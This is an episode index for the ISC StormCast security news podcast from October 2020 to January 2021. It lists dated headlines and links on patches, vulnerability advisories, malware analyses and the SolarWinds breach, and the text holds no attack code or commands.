Chrome Will Prefer HTTPS over HTTP By Default https://chromium-review.googlesource.com/c/chromium/src/+/2568448
Android January Patch Day https://source.android.com/security/bulletin/2021-01-01
Telegram Publishes Users' Locations Online https://blog.ahmed.nyc/2021/01/if-you-use-this-feature-on-telegram.html
1/6/2021, 5 minutes, 52 seconds

ISC StormCast for Tuesday, January 5th, 2021

From a Small BAT File to Mass Logger Infostealer https://isc.sans.edu/forums/diary/From+a+small+BAT+file+to+Mass+Logger+infostealer/26946/
Citrix Releases Updates Addressing DTLS Flaw https://support.citrix.com/article/CTX289674
Zend Framework Deserialization Flaw https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3007 https://github.com/Ling-Yizhou/zendframework3-/blob/main/zend%20framework3%20 %20rce.md
1/5/2021, 5 minutes, 24 seconds

ISC StormCast for Monday, January 4th 2021

Traffic Analysis Quiz https://isc.sans.edu/forums/diary/End+of+Year+Traffic+Analysis+Quiz/26940/
Zyxel Backdoor https://www.eyecontrol.nl/blog/undocumented-user-account-in-zyxel-products.html
Microsoft Source Code Accessed As a Result of SolarWinds Backdoor https://msrc-blog.microsoft.com/2020/12/31/microsoft-internal-solorigate-investigation-update/
1/4/2021, 4 minutes, 22 seconds

ISC StormCast for Wednesday, December 30th 2020

Accessing Restricted Directory Listings via Your AV Solution https://isc.sans.edu/forums/diary/Want+to+know+whats+in+a+folder+you+dont+have+a+permission+to+access+Try+asking+your+AV+solution/26932/
Coin Miner Malware Written in Go https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/?fbclid=IwAR3eFiHCNoqr5mc2UAOcm8nocjUOjZn0cpcAiSoYmn__JtJfBbjqUUT1OwQ
AutoHotKey Credential Stealer https://www.trendmicro.com/en_us/research/20/l/stealth-credential-stealer-targets-us-canadian-bank-customers.html
12/30/2020, 4 minutes, 16 seconds

ISC StormCast for Tuesday, December 29th 2020

Extending Android Device Compatibility for Let's Encrypt Certificates https://letsencrypt.org/2020/12/21/extending-android-compatibility.html
Insufficient Patch for Windows 8.1/10 Print Spooler https://bugs.chromium.org/p/project-zero/issues/detail?id=2096
Google Docs Vulnerability https://savebreach.com/stealing-private-documents-through-a-google-docs-bug/
CCC Conferences Virtual https://streaming.media.ccc.de/rc3
12/29/2020, 5 minutes, 28 seconds

ISC StormCast for Monday, December 28th 2020

base64dump.py Supported Encodings https://isc.sans.edu/forums/diary/base64dumppy+Supported+Encodings/26924/
String Analysis and Maldocs https://isc.sans.edu/forums/diary/Quickie+String+Analysis+Maldocs/26922/
Malicious Word Document Delivering an Octopus Backdoor https://isc.sans.edu/forums/diary/Malicious+Word+Document+Delivering+an+Octopus+Backdoor/26918/
Analysis Dridex Dropper, IoC extraction https://isc.sans.edu/forums/diary/Analysis+Dridex+Dropper+IoC+extraction+guest+diary/26920/
AT&T Outage due to Nashville Explosion https://about.att.com/pages/disaster_relief/nashville.html
SolarWinds SUPERNOVA Malware / API Vulnerability https://www.solarwinds.com/securityadvisory
Citrix ADC DDoS Attack https://support.citrix.com/article/CTX289674
Crowdstrike Reporting Tool for Azure https://github.com/CrowdStrike/CRT
12/28/2020, 5 minutes, 35 seconds

ISC StormCast for Wednesday, December 23rd 2020

Malware Victim Selection Through WiFi Identification https://isc.sans.edu/forums/diary/Malware+Victim+Selection+Through+WiFi+Identification/26910/
New Treck IP Stack Vulnerabilities https://treck.com/vulnerability-response-information/
Detecting Treck IP Stack https://github.com/Forescout/project-memoria-detector
12/23/2020, 3 minutes, 50 seconds

ISC StormCast for Tuesday, December 22nd 2020

What's The Deal With Openportstats.com? https://isc.sans.edu/forums/diary/Whats+the+deal+with+openportstatscom/26912/
Dell Wyse ThinOS 8.6 Security Update https://www.dell.com/support/kbdoc/en-hr/000180768/dsa-2020-281
SolarWinds 2nd Backdoor https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/
SolarWinds Domains https://securelist.com/sunburst-connecting-the-dots-in-the-dns-requests/99862/
12/22/2020, 6 minutes, 14 seconds

ISC StormCast for Monday, December 21st 2020

A slightly optimistic tale of how patching went for CVE-2019-19781 https://isc.sans.edu/forums/diary/A+slightly+optimistic+tale+of+how+patching+went+for+CVE201919781/26900/
Heads-up: VirusTotal Functionality in Sysinternals Tools Not Working https://isc.sans.edu/forums/diary/Headsup+VirusTotal+Functionality+in+Sysinternals+Tools+Not+Working/26906/
Kazakhstan: Browsers Block Government Certificate Authority https://www.zdnet.com/article/apple-google-microsoft-and-mozilla-ban-kazakhstans-mitm-https-certificate/
5G Vulnerabilities https://positive-tech.com/about/news/vulnerabilities-in-standalone-5g-networks-could-allow-attackers-to-steal-credentials-and-falsify-subscriber-authentication/
Bouncy Castle BCrypt Password Verification Error https://www.synopsys.com/blogs/software-security/cve-2020-28052-bouncy-castle/
12/21/2020, 5 minutes, 31 seconds
Episode Artwork

ISC StormCast for Friday, December 18th 2020

Token Authentication Requirements for Git Operations https://github.blog/2020-12-15-token-authentication-requirements-for-git-operations/ Google Attempting to Speed Up OS Update Adoption https://android-developers.googleblog.com/2020/12/treble-plus-one-equals-four.html Trend Micro InterScan Web Security Virtual Appliance Vulnerability https://success.trendmicro.com/solution/000283077 Malicious Browser Extensions https://blog.avast.com/malicious-browser-extensions-avast
12/18/2020, 6 minutes, 20 seconds
Episode Artwork

ISC StormCast for Thursday, December 17th 2020

Cloud DNS Logs https://isc.sans.edu/forums/diary/DNS+Logs+in+Public+Clouds/26892/ SolarWinds Update https://www.heise.de/news/l-f-SolarWinds-Backdoor-Hersteller-sorgte-fuer-Ausnahmen-von-AV-Ueberwachung-4990910.html https://krebsonsecurity.com/2020/12/malicious-domain-in-solarwinds-hack-turned-into-killswitch/ Hewlett Packard Enterprise Systems Insight Manager (SIM) Vulnerability https://support.hpe.com/hpesc/public/docDisplay?docLocale=en_US&docId=hpesbgn04068en_us SAP HANA SAML Validation Weakness https://www.secureauth.com/blog/secureauth-uncovers-saml-validation-weakness-in-sap-hana/
12/17/2020, 6 minutes, 6 seconds
Episode Artwork

ISC StormCast for Wednesday, December 16th 2020

Analyzing A FireEye Maldoc https://isc.sans.edu/forums/diary/Analyzing+FireEye+Maldocs/26882/ Didier Stevens: 2020 Difference Makers https://www.sans.org/webcasts/2020-difference-makers-awards-ceremony-117154 F5 Big IP Vulnerabilities https://support.f5.com/csp/article/K20984059 https://support.f5.com/csp/article/K42696541 https://support.f5.com/csp/article/K37960100 Google Outage https://status.cloud.google.com/incident/zall/20013 GoLang XML Parser Vulnerabilities https://mattermost.com/blog/coordinated-disclosure-go-xml-vulnerabilities/
12/16/2020, 6 minutes, 21 seconds
Episode Artwork

ISC StormCast for Tuesday, December 15th 2020

SolarWinds Followup https://isc.sans.edu/forums/diary/SolarWinds+Breach+Used+to+Infiltrate+Customer+Networks+Solarigate/26884/ https://sansurl.com/solarwinds Apple Updates Everything https://support.apple.com/en-us/HT201222 Sophos and Reversing Labs Release 20 Million Malware Samples https://github.com/sophos-ai/SOREL-20M
12/15/2020, 7 minutes, 6 seconds
Episode Artwork

ISC StormCast for Monday, December 14th 2020

SolarWinds Compromise https://isc.sans.edu/forums/diary/SolarWinds+Breach+Used+to+Infiltrate+Customer+Networks+Solarigate/26884/ Writing Yara Rules for Fun and Profit: Notes from the FireEye Breach Countermeasures https://isc.sans.edu/forums/diary/Writing+Yara+Rules+for+Fun+and+Profit+Notes+from+the+FireEye+Breach+Countermeasures/26870/ Flash Player EoL https://helpx.adobe.com/flash-player/release-note/fp_32_air_32_release_notes.html Subway Marketing System Hacked to Send TrickBot Malware Emails https://www.bleepingcomputer.com/news/security/subway-marketing-system-hacked-to-send-trickbot-malware-emails/
12/14/2020, 5 minutes, 44 seconds
Episode Artwork

ISC StormCast for Friday, December 11th 2020

Python Backdoor Talking to a C2 Through Ngrok https://isc.sans.edu/forums/diary/Python+Backdoor+Talking+to+a+C2+Through+Ngrok/26866/ Cisco Releases Improved Patch for Jabber Vulnerabilities https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-jabber-ZktzjpgO https://watchcom.no/nyheter/nyhetsarkiv/uncovers-cisco-jabber-vulnerabilities/ SANS Holiday Hack Challenge https://holidayhackchallenge.com/2020/ Karim Lalji: Fear of the Unknown: A Metanalysis of Insecure Object Deserialization Vulnerabilities https://www.sans.org/reading-room/whitepapers/testing/fear-unknown-metanalysis-insecure-object-deserialization-vulnerabilities-39920
12/11/2020, 13 minutes, 21 seconds
Episode Artwork

ISC StormCast for Thursday, December 10th 2020

Oblivious DoH https://blog.cloudflare.com/oblivious-dns/ HTTP Archive Almanac https://almanac.httparchive.org/en/2020/security Open Source IoT TCP/IP Stack Vulnerabilities https://www.forescout.com/company/resources/amnesia33-how-tcp-ip-stacks-breed-critical-vulnerabilities-in-iot-ot-and-it-devices/ FireEye Red Team Tool Signatures https://www.fireeye.com/blog/threat-research/2020/12/unauthorized-access-of-fireeye-red-team-tools.html
12/10/2020, 6 minutes, 18 seconds
Episode Artwork

ISC StormCast for Wednesday, December 9th 2020

Microsoft Patch Tuesday https://isc.sans.edu/forums/diary/December+2020+Microsoft+Patch+Tuesday+Exchange+Sharepoint+Dynamics+and+DNS+Spoofing/26860/ Adobe Patch Tuesday https://helpx.adobe.com/security.html OpenSSL Patch (Tuesday) https://www.openssl.org/news/secadv/20201208.txt
12/9/2020, 5 minutes, 51 seconds
Episode Artwork

ISC StormCast for Tuesday, December 8th 2020

Corrupt BASE64 Strings: Detection and Decoding https://isc.sans.edu/forums/diary/Corrupt+BASE64+Strings+Detection+and+Decoding/26616/ Microsoft Teams Remote Code Execution Vulnerability (Patched) https://github.com/oskarsve/ms-teams-rce PlayStation Now RCE https://hackerone.com/reports/873614 Cisco Security Manager Java Deserialization Vulnerabilities https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-csm-java-rce-mWJEedcD
12/8/2020, 5 minutes, 44 seconds
Episode Artwork

ISC StormCast for Monday, December 7th 2020

Proxy Scanner Attempting to Connect to Specific Hostname https://isc.sans.edu/forums/diary/Is+IP+91199118137+testing+Access+to+aahwwx52hostxyz/26852/ Recovering Passwords From Pixelized Screenshots https://www.linkedin.com/pulse/recovering-passwords-from-pixelized-screenshots-sipke-mellema/ Tomcat Information Leak http://mail-archives.us.apache.org/mod_mbox/www-announce/202012.mbox/%3C52858194-2efd-6f17-1821-9036c8494df0%40apache.org%3E Google Updates https://chromereleases.googleblog.com/2020/12/stable-channel-update-for-desktop.html
12/7/2020, 5 minutes, 52 seconds
Episode Artwork

ISC StormCast for Friday, December 4th 2020

Traffic Analysis Quiz: Mr. Natural https://isc.sans.edu/forums/diary/Traffic+Analysis+Quiz+Mr+Natural/26844/ An iOS Zero-Click Radio Proximity Exploit Odyssey https://googleprojectzero.blogspot.com/2020/12/an-ios-zero-click-radio-proximity.html Github "State of the Octoverse" Report https://octoverse.github.com/static/2020-security-report.pdf Christopher Hurless: Open-Source Endpoint Detection and Response with CIS Benchmarks, OSQuery, Elastic Stack and The Hive https://www.sans.org/reading-room/whitepapers/incident/open-source-endpoint-detection-response-cis-benchmarks-osquery-elastic-stack-thehive-39900
12/4/2020, 16 minutes, 48 seconds
Episode Artwork

ISC StormCast for Thursday, December 3rd 2020

Prevalence of DNS Spoofing https://arxiv.org/abs/2011.12978 New npm Malware Includes Bladabindi Trojan https://blog.sonatype.com/bladabindi-njrat-rat-in-jdb.js-npm-malware DarkIRC Bot Exploits Recent Oracle WebLogic Vulnerability https://blogs.juniper.net/en-us/threat-research/darkirc-bot-exploits-oracle-weblogic-vulnerability
12/3/2020, 6 minutes, 54 seconds
Episode Artwork

ISC StormCast for Wednesday, December 2nd 2020

Xanthe Docker Aware Miner https://blog.talosintelligence.com/2020/12/xanthe-docker-aware-miner.html#more Ocean Lotus Mac Backdoor https://www.trendmicro.com/en_us/research/20/k/new-macos-backdoor-connected-to-oceanlotus-surfaces.html OpenClinic vs OpenClinic GA https://labs.bishopfox.com/advisories/openclinic-version-0.8.2 https://us-cert.cisa.gov/ics/advisories/icsma-20-184-01 https://sourceforge.net/p/open-clinic/discussion/1231980/thread/a2e8909fc5/ Register For Cyberstart https://www.cyberstartamerica.org
12/2/2020, 8 minutes, 54 seconds
Episode Artwork

ISC StormCast for Tuesday, December 1st 2020

Decrypting PowerShell Payloads https://isc.sans.edu/forums/diary/Decrypting+PowerShell+Payloads+video/26838/ Trend Micro ServerProtect for Linux https://success.trendmicro.com/solution/000281950 WebKit Vulnerabilities https://blog.talosintelligence.com/2020/11/vuln-spotlight-webkit-use-after-free-nov-2020.html New Skimmer JS https://twitter.com/AffableKraut/status/1333258498910588928
12/1/2020, 6 minutes, 12 seconds
Episode Artwork

ISC StormCast for Monday, November 30th 2020

Live Patching Windows API Calls Using PowerShell https://isc.sans.edu/forums/diary/Live+Patching+Windows+API+Calls+Using+PowerShell/26826/ Threat Hunting with JARM https://isc.sans.edu/forums/diary/Threat+Hunting+with+JARM/26832/ https://isc.sans.edu/forums/diary/Quick+Tip+Using+JARM+With+a+SOCKS+Proxy/26834/ Be Careful With IoT Gifts https://cybernews.com/security/walmart-exclusive-routers-others-made-in-china-contain-backdoors-to-control-devices/ https://www.cyberscoop.com/smart-doorbells-amazon-ebay-ncc-vulnerabilities/ Active Exploitation of Mobile Iron Vulnerabilities https://www.ncsc.gov.uk/news/alert-multiple-actors-attempt-exploit-mobileiron-vulnerability
11/30/2020, 6 minutes, 35 seconds
Episode Artwork

ISC StormCast for Wednesday, November 25th 2020

The Special Case of TCP Resets https://isc.sans.edu/forums/diary/The+special+case+of+TCP+RST/26824/ VMWare Workspace Vulnerability https://www.theregister.com/2020/11/24/vmware_urges_sysadmins_to_implement/ Holiday Hack Challenge 2020 https://holidayhackchallenge.com/2020/
11/25/2020, 11 minutes, 17 seconds
Episode Artwork

ISC StormCast for Tuesday, November 24th 2020

Quick Tip: Cobalt Strike Beacon Analysis https://isc.sans.edu/forums/diary/Quick+Tip+Cobalt+Strike+Beacon+Analysis/26818/ Godaddy Social Engineering Used to Compromise Bitcoin Exchange Domains https://blog.liquid.com/security-incident-november-13-2020 Spoofed FBI Domains https://www.ic3.gov/Media/Y2020/PSA201123
11/24/2020, 3 minutes, 42 seconds
Episode Artwork

ISC StormCast for Monday, November 23rd 2020

Updates for VMware ESXi, Fusion and Workstation https://www.vmware.com/security/advisories/VMSA-2020-0026.html IBM DB2 Vulnerability https://www.ibm.com/support/pages/node/6370025 https://www.ibm.com/support/pages/node/6370023 Fortinet SSL VPN Exploit Used to Collect Credentials https://twitter.com/Bank_Security/status/1329426020647243778
11/23/2020, 3 minutes, 53 seconds
Episode Artwork

ISC StormCast for Friday, November 20th 2020

PowerShell Dropper Delivering Formbook https://isc.sans.edu/forums/diary/PowerShell+Dropper+Delivering+Formbook/26806/ Google Leading the Way in Phishing https://www.armorblox.com/blog/ok-google-build-me-a-phishing-campaign Identifying Malicious Servers With JARM https://engineering.salesforce.com/easily-identify-malicious-servers-on-the-internet-with-jarm-e095edac525a Daniel Behrens: Industrial Traffic Collection: Understanding the Implications of Deploying Visibility Without Impacting Production https://www.sans.org/reading-room/whitepapers/ICS/industrial-traffic-collection-understanding-implications-deploying-visibility-impacting-production-39810
11/20/2020, 15 minutes, 59 seconds
Episode Artwork

ISC StormCast for Thursday, November 19th 2020

When Security Controls Lead to Security Issues https://isc.sans.edu/forums/diary/When+Security+Controls+Lead+to+Security+Issues/26804/ Google Chrome Update https://chromereleases.googleblog.com/2020/11/stable-channel-update-for-desktop_17.html Firefox 83 HTTPS Only Mode https://blog.mozilla.org/security/2020/11/17/firefox-83-introduces-https-only-mode/ OOB Windows Kerberos Update https://docs.microsoft.com/en-us/windows/release-information/windows-message-center Cisco WebEx Patch Fixes "Ghost Users" https://securityintelligence.com/posts/ibm-works-with-cisco-exorcise-ghosts-webex-meetings/ Ransomware Flooding Printers https://twitter.com/Irlenys/status/1327784305465188353
11/19/2020, 5 minutes, 7 seconds
Episode Artwork

ISC StormCast for Wednesday, November 18th 2020

Apple Binaries Used to Bypass 3rd Party Security Products on MacOS 11 https://twitter.com/patrickwardle/status/1327726496203476992 Apple Improving Privacy on App Certificate Checks https://support.apple.com/en-us/HT202491 Cisco Security Manager Vulnerabilities https://gist.github.com/Frycos/8bf5c125d720b3504b4f28a1126e509e https://tools.cisco.com/security/center/publicationListing.x
11/18/2020, 5 minutes, 37 seconds
Episode Artwork

ISC StormCast for Tuesday, November 17th 2020

Old Vulnerabilities Don't Die https://isc.sans.edu/forums/diary/Heartbleed+BlueKeep+and+other+vulnerabilities+that+didnt+disappear+just+because+we+dont+talk+about+them+anymore/26798/ Citrix Virtual Apps and Desktops Security Update https://support.citrix.com/article/CTX285059 Zoom Security Improvements https://blog.zoom.us/new-ways-to-combat-zoom-meeting-disruptions/ Firefox File Read Vulnerability Details https://medium.com/@kanytu/firefox-and-how-a-website-could-steal-all-of-your-cookies-581fe4648e8d
11/17/2020, 6 minutes, 10 seconds
Episode Artwork

ISC StormCast for Monday, November 16th 2020

Oledump Removed Macro Indicator https://isc.sans.edu/forums/diary/oledumps+Indicator/26794/ Old Worm But New Obfuscation Technique https://isc.sans.edu/forums/diary/Old+Worm+But+New+Obfuscation+Technique/26792/ MacOS OCSP Disaster https://blog.cryptohack.org/macos-ocsp-disaster VoltPillager: Hardware-based fault injection attacks against Intel SGX Enclaves using the SVID voltage scaling interface https://www.usenix.org/system/files/sec21summer_chen-zitai.pdf
11/16/2020, 6 minutes, 41 seconds
Episode Artwork

ISC StormCast for Friday, November 13th 2020

Preventing Exposed Azure Blob Storage https://isc.sans.edu/forums/diary/Preventing+Exposed+Azure+Blob+Storage/26786/ Apple Security Updates https://support.apple.com/en-us/HT201222 DNS Cache Poisoning Attack Reloaded https://dl.acm.org/doi/pdf/10.1145/3372297.3417280 Rebel Powell: Poisoned Postman: Detecting Manipulation of Compliance Features in a Microsoft Exchange Online Environment https://www.sans.org/reading-room/whitepapers/cloud/poisoned-postman-detecting-manipulation-compliance-features-microsoft-exchange-online-environment-39850
11/13/2020, 14 minutes, 3 seconds
Episode Artwork

ISC StormCast for Thursday, November 12th 2020

Traffic Analysis Quiz https://isc.sans.edu/forums/diary/Traffic+Analysis+Quiz+DESKTOPFX23IK5/26780/ Open Source Security Scorecards https://github.com/ossf/scorecard Bitdefender: UPX Unpacking Featuring Ten Memory Corruptions https://landave.io/2020/11/bitdefender-upx-unpacking-featuring-ten-memory-corruptions/ Ubuntu 20.04 Privilege Escalation https://securitylab.github.com/research/Ubuntu-gdm3-accountsservice-LPE
11/12/2020, 6 minutes, 2 seconds
Episode Artwork

ISC StormCast for Wednesday, November 11th 2020

Microsoft Patch Tuesday https://isc.sans.edu/forums/diary/Microsoft+November+2020+Patch+Tuesday/26778/ "Platypus" Attack against Intel SGX https://platypusattack.com/ Adobe Updates https://helpx.adobe.com/security.html Firefox Updates https://www.mozilla.org/en-US/security/advisories/mfsa2020-49/#CVE-2020-26950 Fingerprinting ADS-B Signals https://icnp20.cs.ucr.edu/proceedings/aimcom2/Real-World%20ADS-B%20signal%20recognition%20based%20on%20Radio%20Frequency%20Fingerprinting.pdf
11/11/2020, 6 minutes, 26 seconds
Episode Artwork

ISC StormCast for Tuesday, November 10th 2020

How Attackers Brush Up Their Malicious Scripts https://isc.sans.edu/forums/diary/How+Attackers+Brush+Up+Their+Malicious+Scripts/26770/ RansomEXX Trojan Attacks Linux Systems https://securelist.com/ransomexx-trojan-attacks-linux-systems/99279/ Fake Microsoft Teams Updates Lead to Cobalt Strike Deployment https://www.bleepingcomputer.com/news/security/fake-microsoft-teams-updates-lead-to-cobalt-strike-deployment/ More NPM Malware Found https://blog.sonatype.com/discord.dll-successor-to-npm-fallguys- The Internet is Getting Safer: Fall 2020 RPKI Update https://blog.cloudflare.com/rpki-2020-fall-update/
11/10/2020, 5 minutes, 58 seconds
Episode Artwork

ISC StormCast for Monday, November 9th 2020

Cryptojacking Targeting WebLogic TCP/7001 https://isc.sans.edu/forums/diary/Cryptojacking+Targeting+WebLogic+TCP7001/26768/
Extracting VBA Code From Maldocs https://isc.sans.edu/forums/diary/Quick+Tip+Extracting+all+VBA+Code+from+a+Maldoc/26772/
Let's Encrypt May No Longer Be Recognized by Older Android Versions https://letsencrypt.org/2020/11/06/own-two-feet.html
Linux Kernel to Remove set_fs() http://lkml.iu.edu/hypermail/linux/kernel/2010.3/00552.html
BigIP Vulnerability https://support.f5.com/csp/article/K43310520
11/9/2020 (5 minutes, 16 seconds)

ISC StormCast for Friday, November 6th 2020

Did You Spot "Invoke-Expression"? https://isc.sans.edu/forums/diary/Did+You+Spot+InvokeExpression/26762/
Apple Security Updates https://support.apple.com/en-us/HT201222
Corporate VoIP Phone System Attacks https://blog.checkpoint.com/2020/11/05/whos-calling-gaza-and-west-bank-hackers-exploit-and-monetize-corporate-voip-phone-system-vulnerability-internationally/
Mark Lucas: Replacing WINS in an Open Environment with Policy Managed DNS Servers https://www.sans.org/reading-room/whitepapers/dns/replacing-wins-open-environment-policy-managed-dns-servers-39820
11/6/2020 (15 minutes, 51 seconds)

ISC StormCast for Thursday, November 5th 2020

Cisco AnyConnect Security Mobility Client https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-anyconnect-ipc-KfQO9QhK
Google Chrome Root CA Policy https://www.chromium.org/Home/chromium-security/root-ca-policy
Android November 2020 Security Bulletin https://source.android.com/security/bulletin/2020-11-01
11/5/2020 (5 minutes, 39 seconds)

ISC StormCast for Wednesday, November 4th 2020

Attackers Exploiting WebLogic Servers to Install Cobalt Strike https://isc.sans.edu/forums/diary/Attackers+Exploiting+WebLogic+Servers+via+CVE202014882+to+install+Cobalt+Strike/26752
New SaltStack Vulnerabilities https://www.saltstack.com/blog/on-november-3-2020-saltstack-publicly-disclosed-three-new-cves/
Adobe Releases Acrobat/Reader Update https://helpx.adobe.com/security/products/acrobat/apsb20-67.html
Malicious Twilio NPM Package https://www.npmjs.com/advisories/1574
GitHub Workflow Injection Vulnerabilities https://bugs.chromium.org/p/project-zero/issues/detail?id=2070&can=2&q=&colspec=ID%20Type%20Status%20Priority%20Milestone%20Owner%20Summary&cells=ids
11/4/2020 (5 minutes, 16 seconds)

ISC StormCast for Tuesday, November 3rd 2020

Emotet -> Qakbot -> More Emotet https://isc.sans.edu/forums/diary/Emotet+Qakbot+more+Emotet/26750/
WebLogic Bad News https://www.oracle.com/security-alerts/alert-cve-2020-14750.html https://twitter.com/80vul/status/1322078337137700865
Google Chrome Update https://chromereleases.googleblog.com/2020/11/stable-channel-update-for-desktop.html
NAT Slipstreaming Re-Discovered https://thehackernews.com/2020/11/new-natfirewall-bypass-attack-lets.html
11/3/2020 (6 minutes, 39 seconds)

ISC StormCast for Monday, November 2nd 2020

Quick Status of the CAA DNS Record Adoption https://isc.sans.edu/forums/diary/Quick+Status+of+the+CAA+DNS+Record+Adoption/26738/
Windows Kernel cng.sys pool-based buffer overflow CVE-2020-17087 https://bugs.chromium.org/p/project-zero/issues/detail?id=2104
Operation Earth Kitsune https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/operation-earth-kitsune-tracking-slub-s-current-operations
11/2/2020 (5 minutes, 30 seconds)

ISC StormCast for Friday, October 30th 2020

PATCH NOW: CVE-2020-14882 WebLogic Actively Exploited https://isc.sans.edu/forums/diary/PATCH+NOW+CVE202014882+Weblogic+Actively+Exploited+Against+Honeypots/26734/
ZoneAlarm Update https://www.zonealarm.com/software/extreme-security/release-history
Ransomware Targeting Healthcare https://us-cert.cisa.gov/ncas/alerts/aa20-302a
OpenEMR Vulnerabilities https://blog.sonarsource.com/openemr-5-0-2-1-command-injection-vulnerability
Mishka McCowan: Mitigating Risk with the CSA 12 Critical Risks for Serverless Applications https://www.sans.org/reading-room/whitepapers/cloud/mitigating-risk-csa-12-critical-risks-serverless-applications-39845
10/30/2020 (14 minutes, 55 seconds)

ISC StormCast for Thursday, October 29th 2020

SMBGhost Remains Unpatched on 8% of Exposed SMB Servers https://isc.sans.edu/forums/diary/SMBGhost+the+critical+vulnerability+many+seem+to+have+forgotten+to+patch/26732/
Microsoft Defender ATP Cobalt Strike False Positive https://twitter.com/ffforward/status/1321375690084810753?s=20
QNAP Security Advisory https://www.qnap.com/en/security-advisory/QSA-20-09
New Linux Trickbot Version Sighted https://www.netscout.com/blog/asert/dropping-anchor
Abuse.ch Needs Help https://abuse.ch/blog/moving-forward/
10/29/2020 (5 minutes, 51 seconds)

ISC StormCast for Wednesday, October 28th 2020

Vulnerable SonarQube Configurations Used to Steal Code https://beta.documentcloud.org/documents/20399900-fbi_flash_sonarqube_access_bc
Microsoft Edge Security Updates (Chromium-Based) https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/ADV200002
Microsoft Releases Flash Removal Tool https://support.microsoft.com/en-us/help/4577586/update-for-removal-of-adobe-flash-player
Bypassing MSFT Teams Policies https://o365blog.com/post/teams-policies/
10/28/2020 (5 minutes, 19 seconds)

ISC StormCast for Tuesday, October 27th 2020

Excel 4 Macros: "Abnormal Sheet Visibility" https://isc.sans.edu/forums/diary/Excel+4+Macros+Abnormal+Sheet+Visibility/26726/
HP Printer Applications Certificate Revoked https://eclecticlight.co/2020/10/23/why-have-my-hp-printers-stopped-working-how-to-check-their-software-signature/
Link Previews and Privacy https://www.mysk.blog/2020/10/25/link-previews/
10/27/2020 (6 minutes, 9 seconds)

ISC StormCast for Monday, October 26th 2020

An Alternative to Shodan: Censys https://isc.sans.edu/forums/diary/An+Alternative+to+Shodan+Censys+with+UserAgent+CensysInspect11/26718/
Sooty: SOC Analyst's All-in-One Tool https://isc.sans.edu/forums/diary/Sooty+SOC+Analysts+AllinOne+Tool/26714/
Adversarial ML Threat Matrix https://github.com/mitre/advmlthreatmatrix
Samsung S20 RCE https://labs.f-secure.com/blog/samsung-s20-rce-via-samsung-galaxy-store-app/
VMware Advisory https://www.vmware.com/security/advisories/VMSA-2020-0023.html
10/26/2020 (5 minutes, 39 seconds)

ISC StormCast for Friday, October 23rd 2020

BazarLoader Phishing Lures https://isc.sans.edu/forums/diary/BazarLoader+phishing+lures+plan+a+Halloween+party+get+a+bonus+and+be+fired+in+the+same+afternoon/26710/
Stalled Reviews for Secure Boot Shim https://github.com/rhboot/shim-review/issues/120 https://github.com/rhboot/shim-review/issues/102#issuecomment-698963751
Cisco Advisories https://tools.cisco.com/security/center/publicationListing.x
10/23/2020 (5 minutes, 42 seconds)

ISC StormCast for Thursday, October 22nd 2020

Shipping Dangerous Goods https://isc.sans.edu/forums/diary/Shipping+dangerous+goods/26702/
Chinese State-Sponsored Actors Exploit Same Vulnerabilities as Others https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF
URL Bar Spoofing Vulnerabilities https://thehackernews.com/2020/10/browser-address-spoofing-vulnerability.html
Oracle Quarterly Critical Patch Update https://www.oracle.com/security-alerts/cpuoct2020.html
10/22/2020 (5 minutes, 40 seconds)

ISC StormCast for Wednesday, October 21st 2020

Mirai-alike Python Scanner https://isc.sans.edu/forums/diary/Miraialike+Python+Scanner/26698/
Google Chrome Update (actively exploited vulnerability fixed) https://chromereleases.googleblog.com/2020/10/stable-channel-update-for-desktop_20.html
QNAP Fixes ZeroLogon Vulnerability https://www.qnap.com/en/security-advisory/qsa-20-07
GravityRat Going Multi Platform https://usa.kaspersky.com/about/press-releases/2020_infamous-gravity-rat-spyware-evolves-to-target-multiple-platforms
US Census Spoof https://beta.documentcloud.org/documents/20397864-fbi-flash-unattributed-entities-register-domains-10142020
10/21/2020 (5 minutes, 49 seconds)

ISC StormCast for Tuesday, October 20th 2020

Out of Band MSFT Patches https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2020-17022 https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2020-17023
Adobe Magento Patches https://helpx.adobe.com/security/products/magento/apsb20-59.html
Attacks against SS7 https://www.haaretz.com/israel-news/tech-news/.premium-exclusive-intricate-hack-against-israeli-crypto-execs-mossad-investigating-1.9211991 https://www.bleepingcomputer.com/news/security/hackers-hijack-telegram-email-accounts-in-ss7-mobile-attack/
10/20/2020 (5 minutes, 8 seconds)

ISC StormCast for Monday, October 19th 2020

CVE-2020-5135 SonicWall Buffer Overflow https://isc.sans.edu/forums/diary/CVE20205135+Buffer+Overflow+in+SonicWall+VPNs+Patch+Now/26692/
Spammer Attached Mass Mailer Configuration Instead of Malware https://isc.sans.edu/forums/diary/File+Selection+Gaffe/26694/
Traffic Analysis Quiz: Ugly-Wolf.net https://isc.sans.edu/forums/diary/Traffic+Analysis+Quiz+UglyWolfnet/26688/
Qualcomm QCMAP Vulnerabilities https://www.vdoo.com/blog/qualcomm-qcmap-vulnerabilities
Discord Desktop App RCE https://mksben.l0.cm/2020/10/discord-desktop-rce.html
10/19/2020 (6 minutes, 53 seconds)

ISC StormCast for Friday, October 16th 2020

Obfuscated Python RAT https://isc.sans.edu/forums/diary/Nicely+Obfuscated+Python+RAT/26680/
BadNeighbor ICMPv6 Router Advertisement Update https://isc.sans.edu/forums/diary/CVE202016898+Windows+ICMPv6+Router+Advertisement+RRDNS+Option+Remote+Code+Execution+Vulnerability/26684/
BlueZ Vulnerability https://www.youtube.com/watch?v=qPYrLRausSw https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00435.html https://security.googleblog.com/ (available "soon")
Zoom Rolling Out End-to-End Encryption https://blog.zoom.us/zoom-rolling-out-end-to-end-encryption-offering/
10/16/2020 (5 minutes, 48 seconds)

ISC StormCast for Thursday, October 15th 2020

